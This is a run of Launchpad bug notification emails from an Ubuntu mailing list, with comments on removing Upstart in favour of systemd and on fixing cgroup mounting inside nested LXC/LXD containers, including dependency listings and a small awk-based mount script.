it, don't remember how far i got), but in the end to provide meaningful
details i'd have to *run* it.  Stop trying to get me to run it.  Thanks.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to ubuntu-touch-meta in
Ubuntu.
https://bugs.launchpad.net/bugs/1649310

Title:
  RM Upstart, obsolete, superseded by systemd

Status in cgmanager package in Ubuntu:
  Triaged
Status in lxc-android-config package in Ubuntu:
  Triaged
Status in ubuntu-touch-meta package in Ubuntu:
  Triaged
Status in ubuntu-touch-session package in Ubuntu:
  Triaged
Status in unity8-desktop-session package in Ubuntu:
  Triaged
Status in upstart package in Ubuntu:
  Triaged
Status in upstart-watchdog package in Ubuntu:
  Triaged

Bug description:
  In 18.04 LTS src:upstart should not be part of Ubuntu.
  It has already been removed from Debian.
  And most products have migrated to systemd.
  This is a tracking bug to remove a collection of packages that need to go 
away together with upstart.

  Some of these have been ported to systemd under different names, or no
  longer at all required.

  = Removal order =

  * ubuntu-touch-meta
  * unity8-desktop-session

  * ubuntu-touch-session
  * upstart-watchdog
  * lxc-android-config

  * upstart

  * cgmanager

  = Reverse depends checks =

  $ reverse-depends -b src:upstart
  Reverse-Build-Depends
  =
  * tarantool (for upstart)
    ./debian/control: dh-systemd (>= 1.22) | sysvinit (<< 2.88dsf-59) | upstart 
(<< 1.13),
  * unity (for libupstart-dev)
    https://code.launchpad.net/~xnox/unity/no-more-upstart-dep/+merge/322283
    https://bileto.ubuntu.com/#/ticket/2730

  $ reverse-depends src:upstart
  Reverse-Depends
  ===
  * ubuntu-touch-session  (for upstart)
  * unity8-desktop-session(for upstart)
  * upstart-watchdog  (for upstart)

  $ reverse-depends src:ubuntu-touch-session
  Reverse-Depends
  ===
  * ubuntu-touch  (for ubuntu-touch-session)
  $ reverse-depends -b src:ubuntu-touch-session
  No reverse dependencies found

  $ reverse-depends upstart-watchdog
  Reverse-Depends
  ===
  * ubuntu-touch
  $ reverse-depends -b src:upstart-watchdog
  No reverse dependencies found

  $ reverse-depends src:ubuntu-touch-meta
  No reverse dependencies found
  $ reverse-depends -b src:ubuntu-touch-meta
  No reverse dependencies found

  $ reverse-depends src:unity8-desktop-session
  No reverse dependencies found
  $ reverse-depends -b src:unity8-desktop-session
  No reverse dependencies found

  $ reverse-depends src:cgmanager
  Reverse-Depends
  ===
  * lxc-android-config(for cgmanager)
  * numad (for cgmanager)
    ./debian/control:Depends: systemd-sysv | cgmanager
  * upstart [amd64 arm64 armhf i386 ppc64el]  (for libcgmanager0)

  $ reverse-depends -b src:cgmanager
  Reverse-Build-Depends
  =
  * upstart   (for libcgmanager-dev)

  $ reverse-depends src:lxc-android-config
  Reverse-Depends
  ===
  * ubuntu-touch  (for lxc-android-config)

  $ reverse-depends -b src:lxc-android-config
  No reverse dependencies found

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/cgmanager/+bug/1649310/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1649310] Re: RM Upstart, obsolete, superseded by systemd

[Serge Hallyn]

@bryanquigley that's an odd non-sequitur.  I'm avoiding switching to
systemd (in part for power usage), and cgroupfs-mount is not the thing
being removed.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to ubuntu-touch-meta in
Ubuntu.
https://bugs.launchpad.net/bugs/1649310

Title:
  RM Upstart, obsolete, superseded by systemd

Status in cgmanager package in Ubuntu:
  Triaged
Status in lxc-android-config package in Ubuntu:
  Triaged
Status in ubuntu-touch-meta package in Ubuntu:
  Triaged
Status in ubuntu-touch-session package in Ubuntu:
  Triaged
Status in unity8-desktop-session package in Ubuntu:
  Triaged
Status in upstart package in Ubuntu:
  Triaged
Status in upstart-watchdog package in Ubuntu:
  Triaged

Bug description:
  In 18.04 LTS src:upstart should not be part of Ubuntu.
  It has already been removed from Debian.
  And most products have migrated to systemd.
  This is a tracking bug to remove a collection of packages that need to go 
away together with upstart.

  Some of these have been ported to systemd under different names, or no
  longer at all required.

  = Removal order =

  * ubuntu-touch-meta
  * unity8-desktop-session

  * ubuntu-touch-session
  * upstart-watchdog
  * lxc-android-config

  * upstart

  * cgmanager

  = Reverse depends checks =

  $ reverse-depends -b src:upstart
  Reverse-Build-Depends
  =
  * tarantool (for upstart)
    ./debian/control: dh-systemd (>= 1.22) | sysvinit (<< 2.88dsf-59) | upstart 
(<< 1.13),
  * unity (for libupstart-dev)
    https://code.launchpad.net/~xnox/unity/no-more-upstart-dep/+merge/322283
    https://bileto.ubuntu.com/#/ticket/2730

  $ reverse-depends src:upstart
  Reverse-Depends
  ===
  * ubuntu-touch-session  (for upstart)
  * unity8-desktop-session(for upstart)
  * upstart-watchdog  (for upstart)

  $ reverse-depends src:ubuntu-touch-session
  Reverse-Depends
  ===
  * ubuntu-touch  (for ubuntu-touch-session)
  $ reverse-depends -b src:ubuntu-touch-session
  No reverse dependencies found

  $ reverse-depends upstart-watchdog
  Reverse-Depends
  ===
  * ubuntu-touch
  $ reverse-depends -b src:upstart-watchdog
  No reverse dependencies found

  $ reverse-depends src:ubuntu-touch-meta
  No reverse dependencies found
  $ reverse-depends -b src:ubuntu-touch-meta
  No reverse dependencies found

  $ reverse-depends src:unity8-desktop-session
  No reverse dependencies found
  $ reverse-depends -b src:unity8-desktop-session
  No reverse dependencies found

  $ reverse-depends src:cgmanager
  Reverse-Depends
  ===
  * lxc-android-config(for cgmanager)
  * numad (for cgmanager)
    ./debian/control:Depends: systemd-sysv | cgmanager
  * upstart [amd64 arm64 armhf i386 ppc64el]  (for libcgmanager0)

  $ reverse-depends -b src:cgmanager
  Reverse-Build-Depends
  =
  * upstart   (for libcgmanager-dev)

  $ reverse-depends src:lxc-android-config
  Reverse-Depends
  ===
  * ubuntu-touch  (for lxc-android-config)

  $ reverse-depends -b src:lxc-android-config
  No reverse dependencies found

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/cgmanager/+bug/1649310/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1649310] Re: RM Upstart, obsolete, superseded by systemd

[Serge Hallyn]

I don't expect upstart to be supported, but it would be nice to keep it
in universe.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to ubuntu-touch-meta in
Ubuntu.
https://bugs.launchpad.net/bugs/1649310

Title:
  RM Upstart, obsolete, superseded by systemd

Status in cgmanager package in Ubuntu:
  New
Status in lxc-android-config package in Ubuntu:
  New
Status in ubuntu-touch-meta package in Ubuntu:
  In Progress
Status in ubuntu-touch-session package in Ubuntu:
  Triaged
Status in unity8-desktop-session package in Ubuntu:
  In Progress
Status in upstart package in Ubuntu:
  Triaged
Status in upstart-watchdog package in Ubuntu:
  Triaged

Bug description:
  In 18.04 LTS src:upstart should not be part of Ubuntu.
  It has already been removed from Debian.
  And most products have migrated to systemd.
  This is a tracking bug to remove a collection of packages that need to go 
away together with upstart.

  Some of these have been ported to systemd under different names, or no
  longer at all required.

  = Removal order =

  * ubuntu-touch-meta
  * unity8-desktop-session

  * ubuntu-touch-session
  * upstart-watchdog
  * lxc-android-config

  * upstart

  * cgmanager

  = Reverse depends checks =

  $ reverse-depends -b src:upstart
  Reverse-Build-Depends
  =
  * autopilot (for upstart)
    https://launchpad.net/ubuntu/+source/autopilot/1.6.0+17.04.20170313-0ubuntu3
  * tarantool (for upstart)
    ./debian/control: dh-systemd (>= 1.22) | sysvinit (<< 2.88dsf-59) | upstart 
(<< 1.13),
  * ubuntuone-credentials (for upstart)
    
https://launchpad.net/ubuntu/+source/ubuntuone-credentials/15.11+17.04.20161107ubuntu1
  * unity (for libupstart-dev)
    https://code.launchpad.net/~xnox/unity/no-more-upstart-dep/+merge/322283
    https://bileto.ubuntu.com/#/ticket/2730

  $ reverse-depends src:upstart
  Reverse-Depends
  ===
  * ubuntu-touch-session  (for upstart)
  * ubuntu-ui-toolkit-autopilot [amd64 arm64 armhf i386 ppc64el]  (for upstart)
    
https://launchpad.net/ubuntu/+source/ubuntu-ui-toolkit/1.3.2190+17.04.20170327ubuntu1
  * unity8-desktop-session(for upstart)
  * upstart-watchdog  (for upstart)

  $ reverse-depends src:ubuntu-touch-session
  Reverse-Depends
  ===
  * ubuntu-touch  (for ubuntu-touch-session)
  $ reverse-depends -b src:ubuntu-touch-session
  No reverse dependencies found

  $ reverse-depends upstart-watchdog
  Reverse-Depends
  ===
  * ubuntu-touch
  $ reverse-depends -b src:upstart-watchdog
  No reverse dependencies found

  $ reverse-depends src:ubuntu-touch-meta
  No reverse dependencies found
  $ reverse-depends -b src:ubuntu-touch-meta
  No reverse dependencies found

  $ reverse-depends src:unity8-desktop-session
  No reverse dependencies found
  $ reverse-depends -b src:unity8-desktop-session
  No reverse dependencies found

  $ reverse-depends src:cgmanager
  Reverse-Depends
  ===
  * lxc-android-config(for cgmanager)
  * numad (for cgmanager)
    ./debian/control:Depends: systemd-sysv | cgmanager
  * ubuntu-core-libs  (for libcgmanager0)
    https://launchpad.net/ubuntu/+source/ubuntu-core-meta/0.6.17
  * upstart [amd64 arm64 armhf i386 ppc64el]  (for libcgmanager0)

  $ reverse-depends -b src:cgmanager
  Reverse-Build-Depends
  =
  * qtmir (for libcgmanager-dev)
    https://launchpad.net/ubuntu/+source/qtmir/0.5.1+17.04.20170404-0ubuntu3
  * qtmir-gles(for libcgmanager-dev)
    
https://launchpad.net/ubuntu/+source/qtmir-gles/0.5.1+17.04.20170404-0ubuntu3
  * ubuntu-app-launch (for libcgmanager-dev)
    
https://launchpad.net/ubuntu/+source/ubuntu-app-launch/0.12+17.04.20170404.2-0ubuntu3
  * upstart   (for libcgmanager-dev)

  $ reverse-depends src:lxc-android-config
  Reverse-Depends
  ===
  * ubuntu-touch  (for lxc-android-config)

  $ reverse-depends -b src:lxc-android-config
  No reverse dependencies found

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/cgmanager/+bug/1649310/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

Re: [Touch-packages] [Bug 1649310] Re: RM Upstart, obsolete, superseeded by systemd

[Serge Hallyn]

I'm concerned about upstart in particular.  Indeed cgmanager is
unsupported.  I'm using upstart with cgroupfs-mount.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to ubuntu-touch-meta in
Ubuntu.
https://bugs.launchpad.net/bugs/1649310

Title:
  RM Upstart, obsolete, superseeded by systemd

Status in cgmanager package in Ubuntu:
  New
Status in lxc-android-config package in Ubuntu:
  New
Status in ubuntu-touch-meta package in Ubuntu:
  In Progress
Status in ubuntu-touch-session package in Ubuntu:
  Triaged
Status in unity8-desktop-session package in Ubuntu:
  In Progress
Status in upstart package in Ubuntu:
  Triaged
Status in upstart-watchdog package in Ubuntu:
  Triaged

Bug description:
  In 18.04 LTS src:upstart should not be part of Ubuntu.
  It has already been removed from Debian.
  And most products have migrated to systemd.
  This is a tracking bug to remove a collection of packages that need to go 
away together with upstart.

  Some of these have been ported to systemd under different names, or no
  longer at all required.

  = Removal order =

  * ubuntu-touch-meta
  * unity8-desktop-session

  * ubuntu-touch-session
  * upstart-watchdog
  * lxc-android-config

  * upstart

  * cgmanager

  = Reverse depends checks =

  $ reverse-depends -b src:upstart
  Reverse-Build-Depends
  =
  * autopilot (for upstart)
    https://launchpad.net/ubuntu/+source/autopilot/1.6.0+17.04.20170313-0ubuntu3
  * tarantool (for upstart)
    ./debian/control: dh-systemd (>= 1.22) | sysvinit (<< 2.88dsf-59) | upstart 
(<< 1.13),
  * ubuntuone-credentials (for upstart)
    
https://launchpad.net/ubuntu/+source/ubuntuone-credentials/15.11+17.04.20161107ubuntu1
  * unity (for libupstart-dev)
    https://code.launchpad.net/~xnox/unity/no-more-upstart-dep/+merge/322283
    https://bileto.ubuntu.com/#/ticket/2730

  $ reverse-depends src:upstart
  Reverse-Depends
  ===
  * ubuntu-touch-session  (for upstart)
  * ubuntu-ui-toolkit-autopilot [amd64 arm64 armhf i386 ppc64el]  (for upstart)
    
https://launchpad.net/ubuntu/+source/ubuntu-ui-toolkit/1.3.2190+17.04.20170327ubuntu1
  * unity8-desktop-session(for upstart)
  * upstart-watchdog  (for upstart)

  $ reverse-depends src:ubuntu-touch-session
  Reverse-Depends
  ===
  * ubuntu-touch  (for ubuntu-touch-session)
  $ reverse-depends -b src:ubuntu-touch-session
  No reverse dependencies found

  $ reverse-depends upstart-watchdog
  Reverse-Depends
  ===
  * ubuntu-touch
  $ reverse-depends -b src:upstart-watchdog
  No reverse dependencies found

  $ reverse-depends src:ubuntu-touch-meta
  No reverse dependencies found
  $ reverse-depends -b src:ubuntu-touch-meta
  No reverse dependencies found

  $ reverse-depends src:unity8-desktop-session
  No reverse dependencies found
  $ reverse-depends -b src:unity8-desktop-session
  No reverse dependencies found

  $ reverse-depends src:cgmanager
  Reverse-Depends
  ===
  * lxc-android-config(for cgmanager)
  * numad (for cgmanager)
    ./debian/control:Depends: systemd-sysv | cgmanager
  * ubuntu-core-libs  (for libcgmanager0)
    https://launchpad.net/ubuntu/+source/ubuntu-core-meta/0.6.17
  * upstart [amd64 arm64 armhf i386 ppc64el]  (for libcgmanager0)

  $ reverse-depends -b src:cgmanager
  Reverse-Build-Depends
  =
  * qtmir (for libcgmanager-dev)
    https://launchpad.net/ubuntu/+source/qtmir/0.5.1+17.04.20170404-0ubuntu3
  * qtmir-gles(for libcgmanager-dev)
    
https://launchpad.net/ubuntu/+source/qtmir-gles/0.5.1+17.04.20170404-0ubuntu3
  * ubuntu-app-launch (for libcgmanager-dev)
    
https://launchpad.net/ubuntu/+source/ubuntu-app-launch/0.12+17.04.20170404.2-0ubuntu3
  * upstart   (for libcgmanager-dev)

  $ reverse-depends src:lxc-android-config
  Reverse-Depends
  ===
  * ubuntu-touch  (for lxc-android-config)

  $ reverse-depends -b src:lxc-android-config
  No reverse dependencies found

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/cgmanager/+bug/1649310/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

Re: [Touch-packages] [Bug 1649310] Re: RM Upstart, obsolete, superseeded by systemd

[Serge Hallyn]

(and with that, i'll be needing a new distro :( )

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to ubuntu-touch-meta in
Ubuntu.
https://bugs.launchpad.net/bugs/1649310

Title:
  RM Upstart, obsolete, superseeded by systemd

Status in cgmanager package in Ubuntu:
  New
Status in lxc-android-config package in Ubuntu:
  New
Status in ubuntu-touch-meta package in Ubuntu:
  In Progress
Status in ubuntu-touch-session package in Ubuntu:
  Triaged
Status in unity8-desktop-session package in Ubuntu:
  In Progress
Status in upstart package in Ubuntu:
  Triaged
Status in upstart-watchdog package in Ubuntu:
  Triaged

Bug description:
  In 18.04 LTS src:upstart should not be part of Ubuntu.
  It has already been removed from Debian.
  And most products have migrated to systemd.
  This is a tracking bug to remove a collection of packages that need to go 
away together with upstart.

  Some of these have been ported to systemd under different names, or no
  longer at all required.

  = Removal order =

  * ubuntu-touch-meta
  * unity8-desktop-session

  * ubuntu-touch-session
  * upstart-watchdog
  * lxc-android-config

  * upstart

  * cgmanager

  = Reverse depends checks =

  $ reverse-depends -b src:upstart
  Reverse-Build-Depends
  =
  * autopilot (for upstart)
    https://launchpad.net/ubuntu/+source/autopilot/1.6.0+17.04.20170313-0ubuntu3
  * tarantool (for upstart)
    ./debian/control: dh-systemd (>= 1.22) | sysvinit (<< 2.88dsf-59) | upstart 
(<< 1.13),
  * ubuntuone-credentials (for upstart)
    
https://launchpad.net/ubuntu/+source/ubuntuone-credentials/15.11+17.04.20161107ubuntu1
  * unity (for libupstart-dev)
    https://code.launchpad.net/~xnox/unity/no-more-upstart-dep/+merge/322283
    https://bileto.ubuntu.com/#/ticket/2730

  $ reverse-depends src:upstart
  Reverse-Depends
  ===
  * ubuntu-touch-session  (for upstart)
  * ubuntu-ui-toolkit-autopilot [amd64 arm64 armhf i386 ppc64el]  (for upstart)
    
https://launchpad.net/ubuntu/+source/ubuntu-ui-toolkit/1.3.2190+17.04.20170327ubuntu1
  * unity8-desktop-session(for upstart)
  * upstart-watchdog  (for upstart)

  $ reverse-depends src:ubuntu-touch-session
  Reverse-Depends
  ===
  * ubuntu-touch  (for ubuntu-touch-session)
  $ reverse-depends -b src:ubuntu-touch-session
  No reverse dependencies found

  $ reverse-depends upstart-watchdog
  Reverse-Depends
  ===
  * ubuntu-touch
  $ reverse-depends -b src:upstart-watchdog
  No reverse dependencies found

  $ reverse-depends src:ubuntu-touch-meta
  No reverse dependencies found
  $ reverse-depends -b src:ubuntu-touch-meta
  No reverse dependencies found

  $ reverse-depends src:unity8-desktop-session
  No reverse dependencies found
  $ reverse-depends -b src:unity8-desktop-session
  No reverse dependencies found

  $ reverse-depends src:cgmanager
  Reverse-Depends
  ===
  * lxc-android-config(for cgmanager)
  * numad (for cgmanager)
    ./debian/control:Depends: systemd-sysv | cgmanager
  * ubuntu-core-libs  (for libcgmanager0)
    https://launchpad.net/ubuntu/+source/ubuntu-core-meta/0.6.17
  * upstart [amd64 arm64 armhf i386 ppc64el]  (for libcgmanager0)

  $ reverse-depends -b src:cgmanager
  Reverse-Build-Depends
  =
  * qtmir (for libcgmanager-dev)
    https://launchpad.net/ubuntu/+source/qtmir/0.5.1+17.04.20170404-0ubuntu3
  * qtmir-gles(for libcgmanager-dev)
    
https://launchpad.net/ubuntu/+source/qtmir-gles/0.5.1+17.04.20170404-0ubuntu3
  * ubuntu-app-launch (for libcgmanager-dev)
    
https://launchpad.net/ubuntu/+source/ubuntu-app-launch/0.12+17.04.20170404.2-0ubuntu3
  * upstart   (for libcgmanager-dev)

  $ reverse-depends src:lxc-android-config
  Reverse-Depends
  ===
  * ubuntu-touch  (for lxc-android-config)

  $ reverse-depends -b src:lxc-android-config
  No reverse dependencies found

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/cgmanager/+bug/1649310/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1576341] Re: systemd in degraded state on startup in LXD containers

[Serge Hallyn]

Thanks, Nish.  My thoughts:

1.a sounds good

1.b i'd like another way to do that, but not sure what a better way would
be.

1.c does lvm also fail in privileged containers?  I can see no use to
running it (for now) in an unprivileged container, so the same solution
as 1.a seems reasonable.

1.d
CAP_ADMIN_READ is not a real capability.  So if 1.d is fixed by that,
then something else is wrong.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to systemd in Ubuntu.
https://bugs.launchpad.net/bugs/1576341

Title:
  systemd in degraded state on startup in LXD containers

Status in lvm2 package in Ubuntu:
  Confirmed
Status in lxd package in Ubuntu:
  Invalid
Status in open-iscsi package in Ubuntu:
  Fix Released
Status in systemd package in Ubuntu:
  Confirmed

Bug description:
  The ubuntu:xenial image shows 'degraded' state in lxd on initial boot.

  $ lxc launch xenial x1
  $ sleep 10
  $ lxc file pull x1/etc/cloud/build.info -
  build_name: server
  serial: 20160420-145324

  $ lxc exec x1 systemctl is-system-running
  degraded

  $ lxc exec x1 -- systemctl --state=failed
    UNIT  LOAD   ACTIVE SUBDESCRIPTION
  ● dev-hugepages.mount   loaded failed failed Huge Pages File System
  ● iscsid.serviceloaded failed failed iSCSI initiator daemon 
(iscsid)
  ● open-iscsi.serviceloaded failed failed Login to default iSCSI 
targets
  ● systemd-remount-fs.serviceloaded failed failed Remount Root and Kernel 
File Systems
  ● systemd-sysctl.serviceloaded failed failed Apply Kernel Variables
  ● lvm2-lvmetad.socket   loaded failed failed LVM2 metadata daemon 
socket
  ● systemd-journald-audit.socket loaded failed failed Journal Audit Socket

  LOAD   = Reflects whether the unit definition was properly loaded.
  ACTIVE = The high-level unit activation state, i.e. generalization of SUB.
  SUB= The low-level unit activation state, values depend on unit type.

  7 loaded units listed. Pass --all to see loaded but inactive units, too.
  To show all installed unit files use 'systemctl list-unit-files'.

  ProblemType: Bug
  DistroRelease: Ubuntu 16.04
  Package: open-iscsi 2.0.873+git0.3b4b4500-14ubuntu3
  ProcVersionSignature: Ubuntu 4.4.0-18.34-generic 4.4.6
  Uname: Linux 4.4.0-18-generic x86_64
  ApportVersion: 2.20.1-0ubuntu2
  Architecture: amd64
  Date: Thu Apr 28 17:28:04 2016
  ProcEnviron:
   TERM=xterm-256color
   PATH=(custom, no user)
  SourcePackage: open-iscsi
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/lvm2/+bug/1576341/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1668724] Re: fails to mount cgroupfs inside containers running on 16.04

[Serge Hallyn]

Sorry, this got lost in my inbox.  I used dput.  I seemed to recall that
in some recent cycle the it became either ok or preferred to use
$release-updates instead of $release-proposed in SRUs.  I can trivially
change it ack to yakkety-proposed if preferred.

For Trusty, I just noticed that the non-backports version was so old
noone could really be using it (and AIUI trusty-backport is enabled by
default).

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to cgroup-lite in Ubuntu.
https://bugs.launchpad.net/bugs/1668724

Title:
  fails to mount cgroupfs inside containers running on 16.04

Status in cgroup-lite package in Ubuntu:
  Fix Released
Status in cgroup-lite source package in Precise:
  Fix Committed
Status in cgroup-lite source package in Trusty:
  New
Status in cgroup-lite source package in Xenial:
  Fix Committed
Status in cgroup-lite source package in Yakkety:
  New

Bug description:
  I need to run nested Ubuntu 12.04 and 14.04 containers on 16.04 hosts,
  and have noticed that the cgroups-mount script for mounting the
  cgroups inside the containers has stopped working. This is because
  systemd now comounts multiple controllers on a single hierarchy, which
  prevents mounting them individually inside the container.

  ===  SRU Justification 
  Impact: nested containers fail to start
  Reproduce:  create a root owned container;  install lxc and cgroup-lite;  
create a container, and try to start it.  Starting will fail if cgroup-lite is 
running in the first level container without this patch.
  Regression potential:  should be low, it's possible that the regexp is simply 
wrong for some cases.
  ===

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/cgroup-lite/+bug/1668724/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

Re: [Touch-packages] [Bug 1668724] Re: fails to mount cgroupfs inside containers running on 16.04

[Serge Hallyn]

Thanks for looking. I'll push that tonight.


  Original Message  
From: Cam Cope
Sent: Monday, March 6, 2017 3:50 PM
To: serge.hal...@gmail.com
Reply To: Bug 1668724
Subject: [Bug 1668724] Re: fails to mount cgroupfs inside containers running on 
16.04

LGTM

-- 
You received this bug notification because you are subscribed to cgroup-
lite in Ubuntu.
Matching subscriptions: cgroup-lite
https://bugs.launchpad.net/bugs/1668724

Title:
fails to mount cgroupfs inside containers running on 16.04

Status in cgroup-lite package in Ubuntu:
Fix Released
Status in cgroup-lite source package in Precise:
New
Status in cgroup-lite source package in Trusty:
New
Status in cgroup-lite source package in Xenial:
New
Status in cgroup-lite source package in Yakkety:
New

Bug description:
I need to run nested Ubuntu 12.04 and 14.04 containers on 16.04 hosts,
and have noticed that the cgroups-mount script for mounting the
cgroups inside the containers has stopped working. This is because
systemd now comounts multiple controllers on a single hierarchy, which
prevents mounting them individually inside the container.

=== SRU Justification 
Impact: nested containers fail to start
Reproduce: create a root owned container; install lxc and cgroup-lite; create a 
container, and try to start it. Starting will fail if cgroup-lite is running in 
the first level container without this patch.
Regression potential: should be low, it's possible that the regexp is simply 
wrong for some cases.
===

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/cgroup-lite/+bug/1668724/+subscriptions

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to cgroup-lite in Ubuntu.
https://bugs.launchpad.net/bugs/1668724

Title:
  fails to mount cgroupfs inside containers running on 16.04

Status in cgroup-lite package in Ubuntu:
  Fix Released
Status in cgroup-lite source package in Precise:
  New
Status in cgroup-lite source package in Trusty:
  New
Status in cgroup-lite source package in Xenial:
  New
Status in cgroup-lite source package in Yakkety:
  New

Bug description:
  I need to run nested Ubuntu 12.04 and 14.04 containers on 16.04 hosts,
  and have noticed that the cgroups-mount script for mounting the
  cgroups inside the containers has stopped working. This is because
  systemd now comounts multiple controllers on a single hierarchy, which
  prevents mounting them individually inside the container.

  ===  SRU Justification 
  Impact: nested containers fail to start
  Reproduce:  create a root owned container;  install lxc and cgroup-lite;  
create a container, and try to start it.  Starting will fail if cgroup-lite is 
running in the first level container without this patch.
  Regression potential:  should be low, it's possible that the regexp is simply 
wrong for some cases.
  ===

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/cgroup-lite/+bug/1668724/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1668724] Re: fails to mount cgroupfs inside containers running on 16.04

[Serge Hallyn]

(s@/tmp/2@/proc/cgroups@ of course)

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to cgroup-lite in Ubuntu.
https://bugs.launchpad.net/bugs/1668724

Title:
  fails to mount cgroupfs inside containers running on 16.04

Status in cgroup-lite package in Ubuntu:
  Triaged
Status in cgroup-lite source package in Precise:
  New
Status in cgroup-lite source package in Trusty:
  New
Status in cgroup-lite source package in Xenial:
  New
Status in cgroup-lite source package in Yakkety:
  New

Bug description:
  I need to run nested Ubuntu 12.04 and 14.04 containers on 16.04 hosts,
  and have noticed that the cgroups-mount script for mounting the
  cgroups inside the containers has stopped working. This is because
  systemd now comounts multiple controllers on a single hierarchy, which
  prevents mounting them individually inside the container.

  ===  SRU Justification 
  Impact: nested containers fail to start
  Reproduce:  create a root owned container;  install lxc and cgroup-lite;  
create a container, and try to start it.  Starting will fail if cgroup-lite is 
running in the first level container without this patch.
  Regression potential:  should be low, it's possible that the regexp is simply 
wrong for some cases.
  ===

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/cgroup-lite/+bug/1668724/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1668724] Re: fails to mount cgroupfs inside containers running on 16.04

[Serge Hallyn]

FWIW something like:

for d in `tail -n +2 /tmp/2 | awk '{
if ($2 == 0)
print $1
else if (a[$2])
a[$2] = a[$2]","$1
else
a[$2]=$1
};END{
for(i in a) {
print a[i]
}
}'`; do
mkdir -p /sys/fs/cgroup/$d
mountpoint -q /sys/fs/cgroup/$d || (mount -n -t cgroup -o $d cgroup 
/sys/fs/cgroup/$d || rmdir /sys/fs/cgroup/$d || true)
 done

seems to work.  Again excluding the possibility of unified hierarchy,
which I've not tested.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to cgroup-lite in Ubuntu.
https://bugs.launchpad.net/bugs/1668724

Title:
  fails to mount cgroupfs inside containers running on 16.04

Status in cgroup-lite package in Ubuntu:
  Triaged
Status in cgroup-lite source package in Precise:
  New
Status in cgroup-lite source package in Trusty:
  New
Status in cgroup-lite source package in Xenial:
  New
Status in cgroup-lite source package in Yakkety:
  New

Bug description:
  I need to run nested Ubuntu 12.04 and 14.04 containers on 16.04 hosts,
  and have noticed that the cgroups-mount script for mounting the
  cgroups inside the containers has stopped working. This is because
  systemd now comounts multiple controllers on a single hierarchy, which
  prevents mounting them individually inside the container.

  ===  SRU Justification 
  Impact: nested containers fail to start
  Reproduce:  create a root owned container;  install lxc and cgroup-lite;  
create a container, and try to start it.  Starting will fail if cgroup-lite is 
running in the first level container without this patch.
  Regression potential:  should be low, it's possible that the regexp is simply 
wrong for some cases.
  ===

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/cgroup-lite/+bug/1668724/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1668724] Re: fails to mount cgroupfs inside containers running on 16.04

[Serge Hallyn]

There is a bug (which is fixed in newer versions) in lxc in that it does
not ignore cgroups which are not used by the container.  So in your
particular case, if you're not using the co-mounted controllers, then
indeed fixing the lxc bug should work for you as well.

Nevertheless some people will want to run containers using those
controllers, so cgroup-lite (and cgroupfs-mount) will need to be fixed.
But that's not your problem :)  I understand if you want to leave it at
this - I'll just need to improve my awk skills :)  I just wanted to ask
to avoid duplication of effort.

Thanks for your help so far.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to cgroup-lite in Ubuntu.
https://bugs.launchpad.net/bugs/1668724

Title:
  fails to mount cgroupfs inside containers running on 16.04

Status in cgroup-lite package in Ubuntu:
  Triaged
Status in cgroup-lite source package in Precise:
  New
